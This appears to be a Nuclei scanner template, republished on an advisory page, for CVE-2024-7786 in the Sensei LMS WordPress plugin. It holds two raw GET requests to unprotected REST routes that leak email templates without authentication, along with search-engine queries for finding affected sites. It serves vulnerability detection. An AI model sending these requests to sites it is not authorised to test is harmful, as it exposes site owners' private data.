
Sensei LMS < 4.24.2 - Email Template Leak

01 Jul 2026 03:36:47 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Sensei LMS plugin < 4.24.2 allows unauthenticated attackers to leak email templates via unprotected REST API routes

id: CVE-2024-7786

info:
  name: Sensei LMS < 4.24.2 - Email Template Leak
  author: s4e-io
  severity: high
  description: |
    The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some of its REST API routes, allowing unauthenticated attackers to leak email templates.
  impact: |
    Unauthenticated attackers can access and leak email templates through unprotected REST API endpoints, potentially exposing sensitive information included in email communications and template configurations.
  remediation: |
    Update Sensei LMS plugin to version 4.24.2 or later to address the REST API protection issue.
  reference:
    - https://wpscan.com/vulnerability/f44e6f8f-3ef2-45c9-ae9c-9403305a548a/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7786
    - https://www.usom.gov.tr/bildirim/tr-24-1387
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-7786
    epss-score: 0.01635
    epss-percentile: 0.73332
  metadata:
    max-request: 2
    verified: true
    vendor: automattic
    product: sensei-lms
    framework: wordpress
    publicwww-query: "/wp-content/plugins/sensei-lms"
    fofa-query: body="/wp-content/plugins/sensei-lms"
  tags: cve,cve2024,wpscan,wp,wp-plugin,wordpress,sensei-lms,exposure,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"id","date_gmt","slug")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: template_id
        json:
          - '.[0].id'
        internal: true

  - raw:
      - |
        GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'sensei_email_preview_id={{template_id}}'
          - 'media?parent={{template_id}}'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d2e8eadd84c543044a13d17056f84d7939da106e1dbba3588201d0fe508e091302200d2a256504baee74c05d54fd6614b38216943e736cd83715c3206f8c214385ea:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (Current)
Vulners AI Score: 5.8 (Medium risk)
CVSS 3.1: 5.3 - 7.5
EPSS: 0.01635